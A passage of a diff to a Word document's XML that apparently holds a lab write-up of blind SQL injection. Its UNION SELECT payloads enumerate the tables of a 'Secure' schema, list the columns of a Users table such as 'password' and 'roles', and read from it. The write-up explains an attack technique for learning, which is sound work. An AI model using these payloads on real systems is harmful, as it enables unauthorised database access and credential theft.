-              </w:rPr>
-              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12998,147 +12128,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Secure' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13163,16 +12153,187 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can add a</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>nother</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> condition to only match table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>are</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> not “testing”. This gives us the second table name “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Next in c), we can get the third table name “Users” by guessing table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>are</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> not either “testing” or “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>W</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>e can repeat th</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>e</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">se </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">steps to get the fourth table name </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>but</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> we found that no character in the candidate charset satisfies the first character of the fourth table</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">there </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>might be only</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> three tables in “Secure</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -13188,104 +12349,27 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>I</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can simply add a condition to only match table name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> which is not “testing”. This gives us the second table name “Trainings”.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Next in c), we can get the third table name “Users” by guessing table name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> which is not either “testing” or “Trainings”.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>W</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>e can repeat the above steps to get the fourth table name and we found that no character in the candidate charset satisfies the first character of the fourth table</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> so we know there are three tables in “Secure” in total.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>but</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> we </w:t>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>However, i</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>t might be the case that we ran out the candidate characters as mentioned in step 2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">. Here </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">we </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13343,9 +12427,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13353,9 +12436,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>column_name</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13363,9 +12445,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13373,9 +12454,26 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>information_schema.columns where table_name='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having substr(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13383,9 +12481,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13393,9 +12490,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>3</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13403,9 +12499,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13413,94 +12508,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>='Users'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>api</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13533,147 +12542,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Users' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13760,21 +12629,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>", "id", "password", "probation", "</w:t>
+              <w:t>"api", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13884,9 +12739,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13894,9 +12748,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>roles</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13904,7 +12757,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t xml:space="preserve"> from </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13913,7 +12766,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>roles</w:t>
+              <w:t>Users</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13922,45 +12775,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Users</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
